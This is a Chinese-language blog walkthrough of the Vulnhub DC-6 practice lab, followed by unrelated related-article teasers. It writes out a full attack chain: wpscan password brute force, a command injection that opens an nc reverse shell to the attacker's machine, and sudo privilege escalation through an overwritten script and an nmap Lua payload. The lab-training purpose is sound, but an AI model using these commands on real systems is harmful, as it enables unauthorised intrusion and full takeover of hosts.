Vulnhub靶场案例渗透[6]- DC6

news/2024/12/22 0:21:07/

文章目录

  • 1. 靶场搭建
  • 2. 信息收集
    • 2.1 确定靶机ip
    • 2.2 主机信息收集
    • 2.3 主机目录扫描
    • 2.4 网站用户名和密码爆破
  • 3. 反弹shell
  • 4. 提权

1. 靶场搭建

靶场源地址

检验下载文件的检验码,对比没问题使用vmware打开


# windwos 命令
Get-FileHash <filePath> -Algorithm MD5
# linux
md5sum filepath

2. 信息收集

2.1 确定靶机ip

根据虚拟机网络适配器模式,确定靶机所在网段。使用nmap进行网段存活主机,排除法确定靶机ip.

nmap -sn 192.168.6.100/24

1728460476155.png
通过排除法确定靶机ip为192.168.6.101

2.2 主机信息收集

通过nmap探测靶机开放端口和端口对应服务

nmap -Ap 1-65535  192.168.6.101

e58f0a7d-9386-4492-9e53-abe16de8b184.jpeg
确定开放端口:

  • 22:ssh服务
  • 80: http服务

访问http://192.168.6.101时,url自动重定向到http://wordy, 修改/etc/hosts添加主机名和ip的映射.成功访问,发现是wordpress框架。

2.3 主机目录扫描

# 目录扫描
dirsearch -u http://wordy

找到登录页面地址,http://wordy/wp-login.php
3dba2ab7-a173-4ff7-a0a7-5bd4c21d6859.jpeg

2.4 网站用户名和密码爆破

这个靶场和dc2靶场使用相同的框架,接下来处理和dc-2靶场差不多方法获取用户名,发现成功获取到用户,加上靶场原页面提供了密码字典的线索,直接进行爆破.可以参考之前的文章DC-2靶场

# 获取网站用户名
wpscan --url http://wordy -e u 
# 爆破
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -e u -P passsword.txt

d175f13f-585e-4052-8679-8c31c0ddeec1.jpeg

成功获取到账号密码
2708e77c-1556-4394-8cbf-ed27b85bda2d.jpeg

3. 反弹shell

登录成功之后,发现后台存在图中可以执行命令。这里输入框长度有限制,可以直接使用浏览器工具修改输入框的最大长度。
0ead5b13-7cb2-4950-8ff1-c01fe54823b9.jpeg

85f6da03-9a16-42f2-8981-6403dc407b5e.jpeg

# kali中执行
nc -lvp 8888
# 输入框中输入
127.0.0.1|nc 192.168.6.106 8888  -e /bin/bash

反弹shell成功,执行python代码创建一个伪终端,提高交互.
7ebc3204-6a85-4f77-b382-b83fc519550e.jpeg

# 创建一个伪终端,提高命令窗口交互
python -c 'import pty; pty.spawn("/bin/bash")'

4. 提权

获取shell之后,在`/home/mark/stuff/things-to-do.txt中发现graham的用户账号密码.然后使用ssh进行登录

b63ad010-cd92-4264-9d79-22bdf5bc51e7.jpeg
`

graphm登录成功之后,执行sudo -l发现graphm可以使用sudo 以jens身份执行脚本。并且graphm有backups.sh的修改权限。

da92cbfe-c897-4714-9c6f-ee8d622f9061.jpeg

使用以下命令获取jens的权限,成功切换至jens身份.

echo "/bin/bash" > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

4e5d9170-075b-48cc-b414-941e33073aa3.jpeg

执行sudo -l,查看sudo权限,发现当前用户可以无密码以root身份执行nmap。尝试使用namp进行提权。

ede72fd1-0851-4bf2-b807-b853b793b71a.jpeg

vim test.lua
# 在lua脚本中输入
os.execute("/bin/bash")
sudo nmap --script test.lua

成功获取root权限.
99339444-e5ec-4841-a5ea-828ab1fe5fa2.jpeg

获取目标flag内容

7a03b4d2-41fb-437c-925e-be733d610027.jpeg


http://www.ppmy.cn/news/1537505.html

相关文章

《网络基础之 HTML 与 CSS 基础 —— 网页的基本结构解析》

《网络基础之 HTML 与 CSS 基础 —— 网页的基本结构解析》 在当今数字化的时代&#xff0c;网页成为了人们获取信息、进行交流和开展业务的重要平台。了解网页的基本结构&#xff0c;对于想要涉足网页开发领域或者仅仅是对网络技术感兴趣的人来说&#xff0c;至关重要。而 HT…

NetApp E2800 混合闪存存储,为专用应用程序优化混合工作负载性能

主要优势 1、经济实惠的性能 利用经济实惠的混合系统中的闪存处理各种混合工作负载。 2、云连接 利用 NetApp SANtricity Cloud Connector&#xff0c;灵活地从 NetApp E2800 系列系统经济高效地备份和恢复到云。 3、经验证的精简性 基于浏览器的现代内置 GUI&#xff0c;不到…

jQuery EasyUI 扩展

jQuery EasyUI 扩展 引言 jQuery EasyUI 是一个流行的 HTML5 框架,用于构建交互式网页界面。它提供了一系列的 UI 组件,如布局、窗口、数据网格等,使得网页开发变得更加简单快捷。然而,尽管 EasyUI 功能丰富,但在某些特定场景下,开发者可能需要更多的定制化功能或组件。…

电动举升行李箱模块(PLGM)详解

一、引言 在当今汽车技术不断发展的时代&#xff0c;汽车电动举升行李箱模块&#xff08;Power Liftgate Module&#xff0c;PLGM&#xff09;作为一项提升汽车便利性和舒适性的重要配置&#xff0c;越来越受到消费者的青睐。PLGM 能够实现行李箱的自动开启和关闭&#xff0c;为…

Linux搭建Hadoop集群(详细步骤)

前言 Hadoop是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下&#xff0c;开发分布式程序。充分利用集群的威力进行高速运算和存储。 说白了就是实现一个任务可以在多个电脑上计算的过程。 一&#xff1a;准备工具 1.1 VMware 1.2L…

【RPC】—Thrift协议 VS Protobuf

Thrift协议 & VS Protobuf ⭐⭐⭐⭐⭐⭐ Github主页&#x1f449;https://github.com/A-BigTree 笔记仓库&#x1f449;https://github.com/A-BigTree/tree-learning-notes 个人主页&#x1f449;https://www.abigtree.top ⭐⭐⭐⭐⭐⭐ 文章目录 Thrift协议 & VS Pro…

C#控制台程序 - 技巧合集

捕获控制台关闭事件 using BSServer.GameServer; using log4net; using System.Runtime.InteropServices;namespace BSServer {internal class Program{#region 控制台关闭public delegate bool ControlCtrlDelegate(int CtrlType);[DllImport("kernel32.dll")]priv…

designer使用生成程序简单示例

文章目录 1.designer生成界面(1)菜单栏与状态栏(a)菜单栏(b)状态栏1).移除菜单栏2).移除菜单栏效果3).移除状态栏4).移除状态栏效果 (2)编辑界面 2.从ui文件转成py文件3.编写main文件运行程序 本章将以一个很简单的程序示例&#xff0c;展示一下designer.exe生成程序的方便快捷…